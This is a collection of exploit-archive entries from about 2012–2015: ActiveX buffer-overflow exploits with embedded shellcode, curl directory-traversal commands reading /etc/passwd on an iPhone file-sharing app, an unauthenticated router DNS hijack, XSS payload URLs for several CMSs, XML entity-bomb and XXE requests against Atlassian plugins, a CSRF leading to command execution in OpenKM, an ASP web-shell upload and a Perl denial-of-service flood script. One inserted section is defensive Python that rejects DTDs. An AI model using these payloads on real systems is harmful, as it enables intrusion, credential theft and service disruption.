
<html>
<br>1 Click Audio Converter Activex Buffer Overflow</br>
<br>Affected version=2.3.6</br>
<br>Vendor Homepage:http://www.dvdvideotool.com/index.htm</br>
<br>Software Link:www.dvdvideotool.com/1ClickAudioConverter.exe</br>
<br>The vulnerability lies in the COM component used by the product SkinCrafter.dll </br>
<br>SkinCrafter.dll version.1.9.2.0</br>
<br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
<br>Author: metacom</br>
<!--Video Poc: http://bit.ly/1GmOAyq -->
<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object>
<script >
junk1 = "";
while(junk1.length < 2048) junk1+="A";
nseh = "\xeb\x06\x90\x90";
seh = "\xD7\x51\x04\x10";
nops= "";
while(nops.length < 50) nops+="\x90";
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
"\x4e\x46\x43\x36\x42\x50\x5a");
junk2 = "";
while(junk2.length < 2048) junk2+="B";
payload = junk1 + nseh + seh + nops+ shellcode + junk2;
arg1=payload;
arg1=arg1;
arg2="defaultV";
arg3="defaultV";
arg4="defaultV";
arg5="defaultV";
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
</script>
</html>
            
<html>
<br>1 Click Extract Audio Activex Buffer Overflow</br>
<br>Affected version=2.3.6</br>
<br>Vendor Homepage:http://www.dvdvideotool.com/index.htm</br>
<br>Software Link:www.dvdvideotool.com/1ClickExtractAudio.exe</br>
<br>The vulnerability lies in the COM component used by the product SkinCrafter.dll </br>
<br>SkinCrafter.dll version.1.9.2.0</br>
<br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
<br>Author: metacom</br>
<!--Video Poc: http://bit.ly/1SYwV3u -->
<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object>
<script >
junk1 = "";
while(junk1.length < 2048) junk1+="A";
nseh = "\xeb\x06\xff\xff";
seh = "\x58\xE4\x04\x10";
nops= "";
while(nops.length < 50) nops+="\x90";
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
"\x4e\x46\x43\x36\x42\x50\x5a");
junk2 = "";
while(junk2.length < 2048) junk2+="B";
payload = junk1 + nseh + seh + nops+ shellcode + junk2;
arg1=payload;
arg1=arg1;
arg2="defaultV";
arg3="defaultV";
arg4="defaultV";
arg5="defaultV";
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
</script>
</html>
            
# Exploit Title: WiFi HD 8.1 - Directory Traversal and Denial of Service
# Date: 2015-05-27
# Exploit Author: Wh1t3Rh1n0 (Michael Allen)
# Vendor Homepage: http://www.savysoda.com
# Software Link: http://www.savysoda.com/WiFiHD/
# Version: 8.1 (Apr 1, 2015)
# Tested on: iPhone

Disclosure Timeline:
* 2015-05-30: Vendor notified via email.
* 2015-06-05: No response from the vendor. Advisory released.


Software description:
=====================
WiFi HD is an iOS app which allows users to share files between their iPhone and PC by running a web server, FTP server, or SMB server on the iPhone or through various cloud services. 


Vulnerabilities:
================
The web server (titled "WiFi" in the app) is vulnerable to multiple directory traversal issues which allow an attacker to download, upload, create, or delete any file to which the app has access. The SMB server (titled "Shared Folder") is vulnerable to a Denial of Service attack when issued the command, "dir -c", within smbclient. It also discloses a listing of all readable files within the iPhone's file system via the IPC$ share.


Web Server Proof-of-Concept
===========================
Read arbitrary files/folders:
    Read /etc/passwd:
        curl "http://[TARGET IP]/../../../../../../../../etc/passwd"
    List contents of the /tmp directory:
        curl "http://[TARGET IP]/../../../../../../../../tmp/"

Create Folders:
    Create the folder, "/tmp/PoC-Folder":
        curl -d 'foldername=/../../../../../../../../tmp/PoC-Folder&button=Create+Folder' "http://[TARGET IP]/"
    
Delete Files/Folders:
    Delete the folder, "/tmp/PoC-Folder":
        curl 'http://[TARGET IP]/!DEL!/../../../../../../../../tmp/PoC-Folder'
                                  
Upload a File:
    Upload /etc/services to /tmp/example.txt:
        curl -F 'file=@/etc/services;filename=/../../../../../../../../tmp/example.txt' -F 'button=Submit' 'http://[TARGET IP]/'

    
SMB Server Proof-of-Concept
===========================
Denial of Service:
    smbclient -N -c 'dir \' //[TARGET IP]/IPC$
    
Browse the iPhone's Filesystem:
    smbclient -N //[TARGET IP]/IPC$
            
  Broadlight Residential Gateway DI3124 
  Unauthenticated Remote DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  No description for morons, 
  script kiddies & noobs !!

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!

  ShodanHQ Dork:
  Server: thttpd/2.25b 29dec2003 Content-Length: 348414


[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/getdns.cgi?"
{"success":true,"totalCount":2,"rows":[{"domain":"googleDNS1","serverip":"8.8.8.8","type":"manual"},
{"domain":"googleDNS2","serverip":"8.8.4.4","type":"manual"}]}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/savedns.cgi?domainname=evilDNS&domainserverip=133.71.33.7"
{success:true,errormsg:"Operation Succeeded"}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/deldns.cgi?serverip=8.8.8.8"
{success:true,errormsg:"Operation Succeeded"}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/deldns.cgi?serverip=8.8.4.4"
{success:true,errormsg:"Operation Succeeded"}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/getconf.cgi" | egrep '(username|password)'
<username>admin</username>
<password>admin</password>
            
source: https://www.securityfocus.com/bid/53585/info

The Unijimpe Captcha is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/captchademo.php/%22%3E%3Cscript%3Ealert%28%27pwned%27%29%3C/script%3E 
            
source: https://www.securityfocus.com/bid/53586/info

Artiphp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Artiphp 5.5.0 Neo is vulnerable; other versions may also be affected. 

POST /artpublic/recommandation/index.php HTTP/1.1
Content-Length: 619
Content-Type: application/x-www-form-urlencoded
Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

add_img_name_post			"onmouseover=prompt(1) joxy
adresse_destinataire			
adresse_expediteur			lab%40zeroscience.mk
asciiart_post				"onmouseover=prompt(2) joxy
expediteur				"onmouseover=prompt(3) joxy
message					Hello%20World
message1				%ef%bf%bd%20Recommand%20%ef%bf%bd%0a%bb%20http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
send					Send
titre_sav				"onmouseover=prompt(4) joxy
url_sav					http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
z39d27af885b32758ac0e7d4014a61561	"onmouseover=prompt(5) joxy
zd178e6cdc57b8d6ba3024675f443e920	2
            
source: https://www.securityfocus.com/bid/53598/info

PHP Address Book is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

PHP Address Book 7.0 is vulnerable; other versions may also be affected. 

http://www.example.com/addressbookv7.0.0/group.php/[XSS]

http://www.example.com/addressbookv7.0.0/translate.php?lang=en&target_language=[XSS] 
            
source: https://www.securityfocus.com/bid/53595/info

JIRA and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data.

Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application.

The following versions are affected:

Versions prior to JIRA 5.0.1 are vulnerable.
Versions prior to Gliffy 3.7.1 are vulnerable.
Versions prior to Tempo versions 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable. 

POST somehost.com HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: somehost.com
Content-Length: 1577

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:authenticateApplication>
         <urn:in0>
            <aut:credential>
               <aut:credential>stuff1</aut:credential>
               <aut:encryptedCredential>?&lol9;</aut:encryptedCredential>
            </aut:credential>
            <aut:name>stuff3</aut:name>
            <aut:validationFactors>
               <aut:ValidationFactor>
                  <aut:name>stuff4</aut:name>
                  <aut:value>stuff5</aut:value>
               </aut:ValidationFactor>
            </aut:validationFactors>
         </urn:in0>
      </urn:authenticateApplication>
   </soapenv:Body>
</soapenv:Envelope>
            
source: https://www.securityfocus.com/bid/53602/info

OpenKM is prone to a cross-site request-forgery vulnerability.

Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected application.

OpenKM 5.1.7 is vulnerable; other versions may also be affected. 

Login as administrator (having the AdminRole) and call the URL in a different browser window:
http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B
 
Alternatively the administrator could browse a prepared HTML page in a new tab:
<html>
<body>
<script>
img = new Image();
img.src="http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B"
</script>
</body>
</html>
 
The above exploit does nothing more than create a file in /tmp:
 
String[] cmd = {"/bin/sh", "-c", "/bin/echo pwned > /tmp/poc"};
Runtime.getRuntime().exec(cmd);
 
Some might also want to browse directories:
http://www.example.com/OpenKM/admin/scripting.jsp?script=import+java.io.*%3B%0D%0A%0D%0Atry+%7B%0D%0A++++String+ls_str%3B%0D%0A++++Process+ls_proc+%3D+Runtime.getRuntime%28%29.exec%28%22%2Fbin%2Fls+-lah%22%29%3B%0D%0A++++DataInputStream+ls_in+%3D+new+DataInputStream%28ls_proc.getInputStream%28%29%29%3B%0D%0A%0D%0A++++while+%28%28ls_str+%3D+ls_in.readLine%28%29%29+%21%3D+null%29+++++++++++%0D%0A++++++++print%28ls_str+%2B+%22%3Cbr%3E%22%29%3B%0D%0A%0D%0A%7D+catch+%28IOException+e%29+%7B%0D%0A%7D
            
source: https://www.securityfocus.com/bid/53603/info

The FishEye and Crucible plugins for JIRA are prone to an unspecified security vulnerability because they fail to properly handle crafted XML data.

Exploiting this issue allows remote attackers to cause denial-of-service conditions or to disclose local sensitive files in the context of an affected application.

FishEye and Crucible versions up to and including 2.7.11 are vulnerable. 

Burp Repeater
Host: somehost.com
Port 443


POST /crowd/services/test HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: somehost.com
Content-Length: 2420

<!DOCTYPE foo [<!ENTITY xxec6079 SYSTEM "file:///etc/passwd"> ]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com" xmlns:soap="http://soap.integration.crowd.atlassian.com">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:addAllPrincipals>
         <urn:in0>
            <!--Optional:-->
            <aut:name>?</aut:name>
            <!--Optional:-->
            <aut:token>?</aut:token>
         </urn:in0>
         <urn:in1>
            <!--Zero or more repetitions:-->
            <soap:SOAPPrincipalWithCredential>
               <!--Optional:-->
               <soap:passwordCredential>
                  <!--Optional:-->
                  <aut:credential>?</aut:credential>
                  <!--Optional:-->
                  <aut:encryptedCredential>?&xxec6079;</aut:encryptedCredential>
               </soap:passwordCredential>
               <!--Optional:-->
               <soap:principal>
                  <!--Optional:-->
                  <soap:ID>?</soap:ID>
                  <!--Optional:-->
                  <soap:active>?</soap:active>
                  <!--Optional:-->
                  <soap:attributes>
                     <!--Zero or more repetitions:-->
                     <soap:SOAPAttribute>
                        <!--Optional:-->
                        <soap:name>?</soap:name>
                        <!--Optional:-->
                        <soap:values>
                           <!--Zero or more repetitions:-->
                           <urn:string>?</urn:string>
                        </soap:values>
                     </soap:SOAPAttribute>
                  </soap:attributes>
                  <!--Optional:-->
                  <soap:conception>?</soap:conception>
                  <!--Optional:-->
                  <soap:description>?</soap:description>
                  <!--Optional:-->
                  <soap:directoryId>?</soap:directoryId>
                  <!--Optional:-->
                  <soap:lastModified>?</soap:lastModified>
                  <!--Optional:-->
                  <soap:name>?</soap:name>
               </soap:principal>
            </soap:SOAPPrincipalWithCredential>
         </urn:in1>
      </urn:addAllPrincipals>
   </soapenv:Body>
</soapenv:Envelope>
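Both Atlassian requests above depend on the DTD: the JIRA/Gliffy/Tempo request nests internal entities so that one reference expands to an enormous string, and the FishEye/Crucible request declares a SYSTEM entity so that /etc/passwd is pulled into the response. The mitigation is the same for both: refuse any document that carries a DOCTYPE or an entity declaration before the parser expands anything. The Python below is an added example written for this page, not code from Atlassian or from the advisories; it uses only the standard library, and the three documents in it are constructed (a three-level cut-down of the entity bomb, a one-entity external-entity document, and a clean SOAP envelope reusing the element names from the requests above).

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXML(ValueError):
    """Raised when a document carries a DOCTYPE or declares an entity."""


def parse_xml_strict(data: str) -> ET.Element:
    """Parse XML, refusing any document that carries a DTD.

    A first pass runs expat with handlers that abort as soon as a DOCTYPE
    or an entity declaration is seen. expat reports these before it
    expands anything, so a nested-entity bomb is never inflated and a
    SYSTEM entity never reaches the file system. Only a document that
    passes the gate is handed to ElementTree.
    """
    scanner = expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE '%s' is not allowed" % name)

    def reject_entity(name, *_ignored):
        raise UnsafeXML("entity '%s' is not allowed" % name)

    scanner.StartDoctypeDeclHandler = reject_doctype
    scanner.EntityDeclHandler = reject_entity
    scanner.Parse(data, True)   # raises UnsafeXML, or ExpatError if malformed
    return ET.fromstring(data)


def is_safe_xml(data: str) -> bool:
    """True when parse_xml_strict() accepts the document."""
    try:
        parse_xml_strict(data)
        return True
    except (UnsafeXML, expat.ExpatError, ET.ParseError):
        return False


# Constructed clean request using the namespaces and element names from the page.
CLEAN_DOC = """<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:urn="urn:SecurityServer"
    xmlns:aut="http://authentication.integration.crowd.atlassian.com">
  <soapenv:Header/>
  <soapenv:Body>
    <urn:authenticateApplication>
      <urn:in0><aut:name>app</aut:name></urn:in0>
    </urn:authenticateApplication>
  </soapenv:Body>
</soapenv:Envelope>"""

# Constructed three-level cut-down of the nested-entity payload shown above.
ENTITY_BOMB_DOC = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<root>&lol3;</root>"""

# Constructed external-entity document of the kind used in the FishEye/Crucible request.
XXE_DOC = """<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>"""


if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_DOC), ("entity bomb", ENTITY_BOMB_DOC), ("xxe", XXE_DOC)):
        print("%-12s accepted=%s" % (label, is_safe_xml(doc)))
```

The DOCTYPE handler fires on the first byte of the DTD, so the cost of the gate is one extra pass over the document and nothing is ever expanded. Rejecting every DTD is stricter than the XML specification requires, but no SOAP or REST endpoint has a reason to accept client-supplied entity declarations, and refusing them outright is simpler to audit than configuring expansion limits per parser.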
            
source: https://www.securityfocus.com/bid/53616/info

Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability.

An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and run it in the context of the webserver process.

Acuity CMS 2.6.2 is vulnerable; prior versions may also be affected. 

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX

-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="path"

/images
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootpath"

/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootdisplay"

http://localhost/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="status"

confirmed
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="action"

fileUpload
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="file1"; filename="0wned.asp"
Content-Type: application/octet-stream

<% response.write("0wned!") %>

-----------------------------6dc3a236402e2--
            
source: https://www.securityfocus.com/bid/53622/info

Yandex.Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Yandex.Server 2010 9.0 is vulnerable; other versions may also be affected. 

http://www.example.com/search/?text=%27);alert(document.cookie)// 
            
source: https://www.securityfocus.com/bid/53640/info

Concrete CMS is prone to the following vulnerabilities because it fails to properly handle user-supplied input.

1. Multiple cross-site scripting vulnerabilities

2. An arbitrary-file-upload vulnerability

3. A denial-of-service vulnerability

An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Concrete CMS versions 5.5 and 5.5.21 are vulnerable. 





Cross Site Scripting:

1) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode="><script>alert(1);</script>

2) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID="><script>alert(document.cookie);</script>&searchInstance=file1337335625

3) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID=13&searchInstance="><script>alert(document.cookie);</script>
3A)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance=&searchInstance=&ccm_order_by=fvDateAdded&ccm_order_dir=asc&searchType=123 &searchInstance="><script>alert(1);</script>
www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance="><script>alert(1);</script>

4)(onmouseovervent) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=" onmouseover="alert(1)"&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]=

4A)(without onmouseover event)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance="><script>alert(1);</script>&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]=

5)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode=move_copy_delete&cID="><script>alert(1);</script>

6) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/edit?searchInstance=');</script><script>alert(document.cookie);</script>&fID=7
&fid=VALID_ID_OF_IAMGE

7)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/add_to?searchInstance="><script>alert(document.cookie);</script>&fID=owned

8)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/replace?searchInstance="><script>alert(document.cookie);</script>&fID=4

9)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/bulk_properties/?&fID[]=17&uploaded=true&searchInstance="><script>alert(document.cookie);</script>
&fid=VALID_ID_OF_IAMGE

10)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/permissions?searchInstance="><script>alert("AkaStep");</script>&fID=owned

11)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id="><script>alert(1);</script>&node=owned&display_mode=full&select_mode=&selectedPageID=

11A)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node="><script>alert(1);</script>&display_mode=full&select_mode=&selectedPageID=

11B)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode="><script>alert(1);</script>&select_mode=&selectedPageID=

11C)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode=owned&selectedPageID="><script>alert(1);</script>

11D)
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode="><script>alert(1);</script>&selectedPageID=owned
(All parameters are echoed into the page source without any sanitization or validation.)

12)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_dialog?ocID="><script>alert(1);</script>&search=1

13)http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/customize_search_columns?searchInstance="><script>alert(document.cookie);</script>



Shell upload:

#### p0c 1 [ Upload File via FlashUploader ] ###==>

http://www.example.com/concrete/flash/thumbnail_editor_2.swf
http://www.example.com/concrete/flash/thumbnail_editor_3.swf
http://www.example.com/concrete/flash/swfupload/swfupload.swf
http://www.example.com/concrete/flash/uploader/uploader.swf

# Upload File/Shell Inj3ct0r.php;.gif




DOS:

#### p0c 2 [ DDos with RPC 'using simple PERL script]===>

#!/usr/bin/perl

use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<66; $i--)
{
$user="w00t".$rand.$i;
$data = "Aa"
;
$lenx = length $data;
$rpc = "POST ".$dir."concrete/js/tiny_mce/plugins/spellchecker/rpc.php HTTP/1.1\r\n". # Or use just /index.php
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $lenx\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$rpc", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
